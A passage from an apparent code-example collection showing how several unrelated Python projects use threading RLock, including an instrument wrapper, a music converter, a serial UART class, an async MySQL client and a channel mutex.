    def ask(self, message, num=-1, encoding="utf-8"):
        """
        Wrapping around the ask method in usbtmc.Instrument
        """
        self.lock.acquire()
        msg = self.instr.ask(message, num, encoding)
        self.lock.release()
        return msg

    def read_raw(self, num=-1):
        """
        Wrapping around the read_raw method in usbtmc.Instrument
        """
        self.lock.acquire()
        msg = self.instr.read_raw(num)
        self.lock.release()
        return msg

    def ask_raw(self, msg, num=-1):
        """
        Wrapping around the ask_raw method in usbtmc.Instrument
        """
        self.lock.acquire()
        msg = self.instr.ask_raw(msg, num)
        self.lock.release()
        return msg
Example no. 42
 def __init__(self):
     self.reader_mutex = RLock()
     self.writer_mutex = RLock() if os.name != 'nt' else None
     self.acquire = self._make_acquire_method()
     self.release = self._make_release_method()
Example no. 43
class MusicLibraryConverterMaster(object):
    '''
    classdocs
    '''
    __instance = None

    def __init__(self, verbose, recursive, threads, includePattern, excludePattern, overwrite, overwriteIfSrcNewer, metadataonly, src, dst, converterType='FFMpeg', srcParams='', dstParams='', srcExt='flac', dstExt='mp3'):
        '''
        Constructor
        '''
        ':type recursive: boolean'
        ':type includePattern: String'
        ':type excludePattern: String'
        ':type threads: int'
        ':type src: String'
        ':type src: String'
        ':type dstExt: String'
        ':type dstExt: String'
        ':type overwrite: String'
        ':type overwriteIfSrcNewer: String'
        self.__verbose = verbose
        self.__recursive = recursive
        self.__includePattern = includePattern
        self.__excludePattern = excludePattern
        self.__threads = threads
#         print ("src="+src)
#         print ("dst="+dst)
        self.__src = Path(src)
        self.__dst = Path(dst)
        self.__srcExt = srcExt
        self.__dstExt = dstExt
        self.__coverExtList = ['jpg', 'jpeg', 'bmp', 'png', 'gif']
        #self.__executer = ProcessPoolExecutor(max_workers=threads)
        self.__executer = ThreadPoolExecutor(max_workers=threads)
        self.__futures = []
        self.__futureEvents = {}
        self.__instance = self
        self.__mutex = RLock()
        self.__evInterrupted = Event()
        self.__overwrite = overwrite
        self.__overwriteIfSrcNewer = overwriteIfSrcNewer
        self.__metadataonly = metadataonly
        self.__converter = MusicLibraryConverterBackendFactory(converterType, srcParams, dstParams)
        if self.__converter is None or not self.__converter.backendFound():
            raise ConverterBackendNotFoundException(converterType)
        
    def handleFiles(self, srcFile, dst):
        ':type src: Path'
        ':type dst: Path'
        if not srcFile.exists():
            raise FileNotFoundError(srcFile)
        dstFile = self.deriveDstFile(srcFile, dst)
        ': :type dstFile: Path'
        skipFile = False
        if dstFile.exists():
            if dstFile.is_symlink() or not os.access(dstFile.as_posix(), os.W_OK):
                skipFile = True # Skip all symlinks and destination files which are not writable
            elif self.__overwrite:
                skipFile = False # Overwrite file as requested!
            elif self.__overwriteIfSrcNewer:
                # Check whether or not the last modification of the source file has been later than the last modification of the destination file
                # Update if newer
                if srcFile.stat().st_mtime < dstFile.lstat().st_mtime:
                    skipFile = True
                else:
                    skipFile = False
            else:
                skipFile = True # In all other cases: it's better to skip this file
        elif self.__metadataonly:
            skipFile = True
        # Do the work!
        if not skipFile:
            try:
                srcFileStr = (str(srcFile)).encode(sys.stdout.encoding, errors='replace').decode(sys.stdout.encoding)
                dstFileStr = (str(dstFile)).encode(sys.stdout.encoding, errors='replace').decode(sys.stdout.encoding)
                #print ('"'+srcFileStr+'"\n -> "'+dstFileStr+'"')
            except Exception as e:
                logging.error('An exception occurred: '+str(e))
            self.__mutex.acquire()
            future = self.__executer.submit(createWorker, self.__verbose, self.__metadataonly, self.__converter, self.__evInterrupted, srcFile, dstFile)
            self.__futures.append(future)
            future.add_done_callback(self.finished)
            self.__mutex.release()
            
    def copyFile(self, srcFile, dstDir):
        ':type file: Path'
        ':type dst: Path'
        dstFile = dstDir.joinpath(srcFile.parts[-1])
        skipFile = False
        if dstFile.exists():
            if dstFile.is_symlink() or not os.access(dstFile.as_posix(), os.W_OK):
                skipFile = True # Skip all symlinks and destination files which are not writable
            elif self.__overwrite:
                skipFile = False # Overwrite file as requested!
            elif self.__overwriteIfSrcNewer:
                # Check whether or not the last modification of the source file has been later than the last modification of the destination file
                # Update if newer
                if srcFile.stat().st_mtime < dstFile.lstat().st_mtime:
                    skipFile = True
                else:
                    skipFile = False
            else:
                skipFile = True # In all other cases: it's better to skip this file
        elif self.__metadataonly:
            skipFile = True
        # Do the work!
        if not skipFile:
            try:
                srcFileStr = (str(srcFile)).encode(sys.stdout.encoding, errors='replace').decode(sys.stdout.encoding)
                dstFileStr = (str(dstFile)).encode(sys.stdout.encoding, errors='replace').decode(sys.stdout.encoding)
                shutil.copyfile(srcFileStr, dstFileStr)
            except Exception as e:
                logging.error('An exception occurred: '+str(e))
    
    def handlePathRecursively(self, src, dst):
        ':type src: Path'
        ':type dst: Path'
        if not src.exists():
            raise FileNotFoundError(src)
        if src.is_file():
            self.handleFiles(src, self.deriveDstFile(src, dst))
        elif src.is_dir():
            #for file in src.glob('*.'+self.__srcExt):
            for p in src.iterdir():
                ':type p: Path'
                if (self.__evInterrupted.is_set()):
                    break
                if p.is_file():
                    if p.name.endswith('.'+self.__srcExt):
                        self.handleFiles(p, dst)
                    else:
                        for cover_ext in self.__coverExtList:
                            if p.name.endswith('.'+cover_ext):
                                self.copyFile(p, dst)
                                break
                elif self.__recursive and p.is_dir():
                    dstSubDir = dst.joinpath(p.parts[-1])
                    ': :type dstSubDir: Path'
                    if not dstSubDir.exists():
                        dstSubDir.mkdir()
                    self.handlePathRecursively(p, dstSubDir)

    def deriveDstFile(self, src, dst):
        ':type src: Path'
        ':type dst: Path'
        if dst.is_file():
            return dst
        if dst.is_dir():
            filename = src.name
            ': :type filename: str'
            if filename.endswith('.'+self.__srcExt):
                #filename.replace(self.__srcExt, self.__dstExt, -1)
                i = filename.rfind('.'+self.__srcExt)
                if i == -1:
                    filename = filename+self.__dstExt
                else:
                    filename = filename[0:i]+"."+self.__dstExt
            return dst.joinpath(filename)
        raise Exception("Error: Destination file '"+str(dst)+"' is neither a file nor an (existing) directory")

    def run(self):
        try:
            if self.__src.exists() and not self.__dst.exists():
                self.__dst.mkdir(parents=True)
            logging.info("Analyzing specified files/directories...")
            self.handlePathRecursively(self.__src, self.__dst)
            finished=False
            while not finished:
                finished=True
                self.__mutex.acquire()
                for f in self.__futures:
                    if not (f.done() or f.cancelled()):
                        finished=False
                self.__mutex.release()
                try:
                    time.sleep(0.1)
                except InterruptedError:
                    pass
            logging.info("Conversion finished")
        except FileNotFoundError as e:
            logging.error('Source file or directory not found: "'+str(e)+'"')
        
    def runTest(self):
        try:
#             self.__mutex.acquire()
            for i in range(6):
                ev = Event()
                self.__mutex.acquire()
                future = self.__executer.submit(createWorker, i, ev)
                self.__futures.append(future)
                self.__futureEvents[future] = ev
                future.add_done_callback(self.finished)
                self.__mutex.release()
                try:
                    time.sleep(2)
                except InterruptedError:
                    pass
                if (self.__evInterrupted.is_set()):
                    break
            #wait(self.__futures, timeout=None, return_when=ALL_COMPLETED)
            finished=0
            while not finished:
                finished=1
#                 print ("waiting: Acquire lock")
                self.__mutex.acquire()
                for f in self.__futures:
                    if not (f.done() or f.cancelled()):
                        finished=0
#                 print ("waiting: Release lock")
                self.__mutex.release()
#            while not(all((f.done() or f.cancelled()) for f in self.__futures)):
#                pass
            logging.info("All tasks are finished")
        except KeyboardInterrupt:
            pass
        
    def interrupt(self):
        logging.info("Sending CTRL-C event to all threads")
        self.__executer.shutdown(wait=False)
        self.__evInterrupted.set()

    def finished(self, future):
        self.__mutex.acquire()
        self.__futures.remove(future)
        self.__mutex.release()
        try:
            future.result()
        except Exception as e:
            logging.error("Worker exited with exception: "+str(e))
Example no. 44
class uart:
    def __init__(self, port=1, baudrate=115200, log=False):
        self.__keywords = []
        self.monitor_string = None
        self.__port = port
        self.__serial = serial.serial_for_url(
            "COM{num}".format(num=self.__port),
            baudrate,
            parity="N",
            rtscts=False,
            xonxoff=False,
            timeout=1,
            do_not_open=True,
        )
        self.__serial.open()
        self.__serial_io = io.TextIOWrapper(io.BufferedRWPair(self.__serial, self.__serial))
        self.__cmd_queue = Queue()
        self.__rx_thread = threading.Thread(target=self.__read_thread, name="rx_thread")
        self.__rx_thread.setDaemon(True)
        self.__rx_thread.start()
        self.__tx_thread = threading.Thread(target=self.__write_thread, name="tx_thread")
        self.__tx_thread.setDaemon(True)
        self.__tx_thread.start()
        self.__mutex = RLock()
        self.__log = log
        self.__is_monitor_rx_enable = False
        self.__echo_method = None
        if log is True:
            ltime = time.localtime(time.time())
            logging.basicConfig(
                filename="log_{mon}_{date}_{h}_{m}_{s}.txt".format(
                    mon=str(ltime.tm_mon).zfill(2),
                    date=str(ltime.tm_mday).zfill(2),
                    h=str(ltime.tm_hour).zfill(2),
                    m=str(ltime.tm_min).zfill(2),
                    s=str(ltime.tm_sec).zfill(2),
                ),
                level=logging.DEBUG,
            )

    def SetEchoFunction(self, method):
        self.__echo_method = method

    def __read_thread(self):
        while True:
            data = self.__serial_io.readline()
            if len(data):
                # print(data)
                if self.__echo_method is not None:
                    self.__echo_method(data)
                if self.__log is True:
                    logging.info("[RX]" + str(data))
            self.__monitor_rx_string_method(data)

    def __write_thread(self):
        while True:
            if not self.__cmd_queue.empty():
                send_data = self.__cmd_queue.get()
                self.__serial_io.write(send_data)
                self.__serial_io.flush()
                if self.__log is True:
                    logging.info("[TX]" + str(send_data))
            time.sleep(0.05)

    def __monitor_rx_string_method(self, data):
        self.__mutex.acquire()
        if self.__is_monitor_rx_enable is True:
            if self.__isMatchString(data) is True:
                self.__is_monitor_rx_enable = False
        self.__mutex.release()

    def __isMatchString(self, data):
        is_hit_string = False
        for keyword in self.__keywords:
            if re.search(keyword, data):
                is_hit_string = True
                break
        return is_hit_string

    def Send(self, content, wait_string_list=[], wait_string_timeout=0):
        assert isinstance(content, str), "content is not a string"
        assert type(wait_string_list) is list, "wait_string_list must be list"
        if len(wait_string_list) > 0:
            self._update_keywords(wait_string_list)
            self.__cmd_queue.put(content)
            start_time = time.time()
            while self.__is_monitor_rx_enable is True:
                if wait_string_timeout != 0:
                    if time.time() - start_time >= wait_string_timeout:
                        break
            if self.__is_monitor_rx_enable is True:
                self.__mutex.acquire()
                self.__is_monitor_rx_enable = False
                self.__mutex.release()
                return False
            return True
        else:
            self.__cmd_queue.put(content)
            return True

    def Connect(self):
        if self.__serial.isOpen() == False:
            self.__serial.open()

    def Disconnect(self):
        self.__serial.close()

    def _update_keywords(self, string_list):
        self.__mutex.acquire()
        self.__keywords = string_list
        self.__is_monitor_rx_enable = True
        self.__mutex.release()

    def WaitString(self, string_list, timeout=0):
        assert type(string_list) is list, "string_list must be list"
        assert len(string_list) > 0, "what string you want to wait"
        assert self.__is_monitor_rx_enable is False, "__is_monitor_rx_enable is True"
        start_time = time.time()
        self._update_keywords(string_list)
        while self.__is_monitor_rx_enable is True:
            if timeout != 0:
                if time.time() - start_time >= timeout:
                    break
        if self.__is_monitor_rx_enable is True:
            self.__mutex.acquire()
            self.__is_monitor_rx_enable = False
            self.__mutex.release()
            return False
        return True
Example no. 45
class Client(object):
    def __init__(self, *args, **kwargs):
        self._args = args
        self._kwargs = kwargs
        self._connection = None
        self._closed = False
        self._close_callback = None
        self._io_loop = kwargs.pop('io_loop', None)

        self.__cursor_lock = RLock()

        if self._io_loop is None:
            self._io_loop = IOLoop.current()

        if "cursorclass" in kwargs and issubclass(kwargs["cursorclass"], Cursor):
            kwargs["cursorclass"] = kwargs["cursorclass"].__delegate_class__

    def connect(self):
        future = Future()

        def on_connect(connection_future):
            if connection_future._exc_info is None:
                self._connection = connection_future._result
                self._connection.set_close_callback(self.on_close)
                future.set_result(self)
            else:
                future.set_exc_info(connection_future._exc_info)

        connection_future = async_call_method(Connection, *self._args, **self._kwargs)

        IOLoop.current().add_future(connection_future, on_connect)
        return future

    def on_close(self):
        self._closed = True

        if self._close_callback and callable(self._close_callback):
            self._close_callback(self)

        self._close_callback = None

    def set_close_callback(self, callback):
        self._close_callback = callback

    def close(self):
        if self._closed:
            return
        return async_call_method(self._connection.close)

    def autocommit(self, value):
        return async_call_method(self._connection.autocommit, value)

    def begin(self):
        return async_call_method(self._connection.begin)

    def commit(self):
        return async_call_method(self._connection.commit)

    def rollback(self):
        return async_call_method(self._connection.rollback)

    def show_warnings(self):
        return async_call_method(self._connection.show_warnings)

    def select_db(self, db):
        return async_call_method(self._connection.select_db, db)

    def cursor(self, cursor_cls=None):
        if cursor_cls is None:
            cursor_cls = self._connection.cursorclass

        if not self.__cursor_lock.acquire(0):
            raise RuntimeError("Connection might provide only one opened cursor")

        if cursor_cls and issubclass(cursor_cls, Cursor):
            original_cursor_cls = cursor_cls.__delegate_class__
        else:
            original_cursor_cls = cursor_cls

        cursor = self._connection.cursor(original_cursor_cls)
        cursor_cls = cursor_cls if issubclass(cursor_cls, Cursor) else cursor.__mytor_class__

        cursor = cursor_cls(cursor)
        cursor._release_lock = lambda *a: self.__cursor_lock.release()
        return cursor

    def query(self, sql, unbuffered=False):
        return async_call_method(self._connection.query, sql, unbuffered)

    def next_result(self):
        return async_call_method(self._connection.next_result)

    def kill(self, thread_id):
        return async_call_method(self._connection.kill, thread_id)

    def ping(self, reconnect=True):
        return async_call_method(self._connection.ping, reconnect)

    def set_charset(self, charset):
        return async_call_method(self._connection.set_charset, charset)

    def __getattr__(self, name):
        return getattr(self._connection, name)
Example no. 46
class MultipleProcessPeptideGlycosylator(TaskBase):
    def __init__(self, connection_specification, hypothesis_id, chunk_size=6500, n_processes=4,
                 glycan_combination_count=None, glycan_limit=_DEFAULT_GLYCAN_STEP_LIMIT):
        self.n_processes = n_processes
        self.connection_specification = connection_specification
        self.chunk_size = chunk_size
        self.hypothesis_id = hypothesis_id
        self.glycan_combination_count = glycan_combination_count
        self.current_glycan_offset = 0
        self.glycan_limit = glycan_limit

        self.input_queue = Queue(10)
        self.output_queue = Queue(1000)
        self.workers = []
        self.dealt_done_event = Event()
        self.ipc_controller = self.ipc_logger()
        self.database_mutex = RLock()

    def spawn_worker(self):
        worker = QueuePushingPeptideGlycosylatingProcess(
            self.connection_specification, self.hypothesis_id, self.input_queue,
            self.output_queue, self.chunk_size, self.dealt_done_event,
            self.ipc_controller.sender(), self.database_mutex,
            glycan_offset=self.current_glycan_offset,
            glycan_limit=self.glycan_limit)
        return worker

    def push_work_batches(self, peptide_ids):
        n = len(peptide_ids)
        i = 0
        chunk_size = min(int(n * 0.05), 1000)
        while i < n:
            self.input_queue.put(peptide_ids[i:(i + chunk_size)])
            i += chunk_size
            self.log("... Dealt Peptides %d-%d %0.2f%%" % (i - chunk_size, min(i, n), (min(i, n) / float(n)) * 100))
        self.log("... All Peptides Dealt")
        self.dealt_done_event.set()

    def create_barrier(self):
        self.database_mutex.__enter__()

    def teardown_barrier(self):
        self.database_mutex.__exit__(None, None, None)

    def create_queue_feeder_thread(self, peptide_ids):
        queue_feeder = Thread(target=self.push_work_batches, args=(peptide_ids,))
        queue_feeder.daemon = True
        queue_feeder.start()
        return queue_feeder

    def spawn_all_workers(self):
        self.workers = []

        for i in range(self.n_processes):
            worker = self.spawn_worker()
            worker.start()
            self.workers.append(worker)

    def process(self, peptide_ids):
        connection = DatabaseBoundOperation(self.connection_specification)
        session = connection.session

        self.log("Begin Creation. Dropping Indices")
        index_controller = toggle_indices(session, Glycopeptide)
        index_controller.drop()

        while self.current_glycan_offset < self.glycan_combination_count:
            _current_progress = float(self.current_glycan_offset + self.glycan_limit)
            _current_percent_complete = _current_progress / self.glycan_combination_count * 100.0
            _current_percent_complete = min(_current_percent_complete, 100.0)
            self.log("... Processing Glycan Combinations %d-%d (%0.2f%%)" % (
                self.current_glycan_offset, min(self.current_glycan_offset + self.glycan_limit,
                                                self.glycan_combination_count),
                _current_percent_complete))
            queue_feeder = self.create_queue_feeder_thread(peptide_ids)
            self.spawn_all_workers()

            has_work = True
            last = 0
            i = 0
            while has_work:
                try:
                    batch = self.output_queue.get(True, 5)
                    try:
                        waiting_batches = self.output_queue.qsize()
                        if waiting_batches > 10:
                            self.create_barrier()
                            self.log("... %d waiting sets." % (waiting_batches,))
                            try:
                                for _ in range(waiting_batches):
                                    batch.extend(self.output_queue.get(True, 1))
                                # check to see if any new work items have arrived while
                                # we've been draining the queue
                                waiting_batches = self.output_queue.qsize()
                                if waiting_batches != 0:
                                    # if so, while the barrier is up, let's write the batch
                                    # to disk and then try to drain the queue again
                                    i += len(batch)
                                    try:
                                        session.bulk_save_objects(batch)
                                        session.commit()
                                    except Exception:
                                        session.rollback()
                                        raise
                                    batch = []
                                    for _ in range(waiting_batches):
                                        batch.extend(self.output_queue.get_nowait())
                            except QueueEmptyException:
                                pass
                            self.teardown_barrier()
                    except NotImplementedError:
                        # platform does not support qsize()
                        pass

                    self.create_barrier()
                    i += len(batch)

                    try:
                        session.bulk_save_objects(batch)
                        session.commit()
                    except Exception:
                        session.rollback()
                        raise
                    finally:
                        self.teardown_barrier()

                    if (i - last) > self.chunk_size * 20:
                        self.log("... %d Glycopeptides Created" % (i,))
                        last = i
                except QueueEmptyException:
                    if all(w.is_work_done() for w in self.workers):
                        has_work = False
                    continue
            queue_feeder.join()
            self.ipc_controller.stop()
            for worker in self.workers:
                self.log("Joining Process %r (%s)" % (worker.pid, worker.is_alive()))
                worker.join()

            self.current_glycan_offset += self.glycan_limit

        self.log("All Work Done. Rebuilding Indices")
        index_controller.create()
Example no. 47
 def __init__(self, version=None, packagePath=None, packageName=None, rosMaster=None, overlayPath=None):
     localPipe, remotePipe = Pipe()
     self._pipe = localPipe
     self._rosRemote = _RosMulti(version, rosMaster, overlayPath, remotePipe)
     self._rosRemote.start()
     self._pipeLock = RLock()
Example no. 48
 def __init__(self, filename, mode="a", encoding=None, delay=0):
     WatchedFileHandler.__init__(self, filename, mode, encoding, delay)
     self._lock = RLock()
Example no. 49
 def __init__(self, idProduct=None, idVendor=None):
     """
     """
     self.lock = RLock()
     self.instr = self.connect(idProduct, idVendor)
     print("Asking *IDN? returns: {}".format(self.ask("*IDN?")))
Example no. 50
class ChannelMutex:
    def __init__(self):
        self.reader_mutex = RLock()
        self.writer_mutex = RLock() if os.name != 'nt' else None
        self.acquire = self._make_acquire_method()
        self.release = self._make_release_method()

    def __getstate__(self):
        return self.reader_mutex, self.writer_mutex

    def __setstate__(self, state):
        self.reader_mutex, self.writer_mutex = state
        self.acquire = self._make_acquire_method()
        self.release = self._make_release_method()

    def __enter__(self):
        if self.acquire():
            return self
        else:
            raise ChannelError("Channel mutex time out")

    def __exit__(self, *_):
        self.release()

    def _make_acquire_method(self):
        def unix_acquire():
            return (self.reader_mutex.acquire(timeout=LOCK_TIMEOUT) and
                    self.writer_mutex.acquire(timeout=LOCK_TIMEOUT))

        def windows_acquire():
            return self.reader_mutex.acquire(timeout=LOCK_TIMEOUT)

        return unix_acquire if os.name != 'nt' else windows_acquire

    def _make_release_method(self):
        def unix_release():
            self.reader_mutex.release()
            self.writer_mutex.release()

        def windows_release():
            self.reader_mutex.release()

        return unix_release if os.name != 'nt' else windows_release

    @property
    @contextmanager
    def reader(self):
        if self.reader_mutex.acquire(timeout=LOCK_TIMEOUT):
            try:
                yield self
            finally:
                self.reader_mutex.release()
        else:
            raise ChannelError("Channel mutex time out")

    @property
    @contextmanager
    def writer(self):
        if self.writer_mutex.acquire(timeout=LOCK_TIMEOUT):
            try:
                yield self
            finally:
                self.writer_mutex.release()
        else:
            raise ChannelError("Channel mutex time out")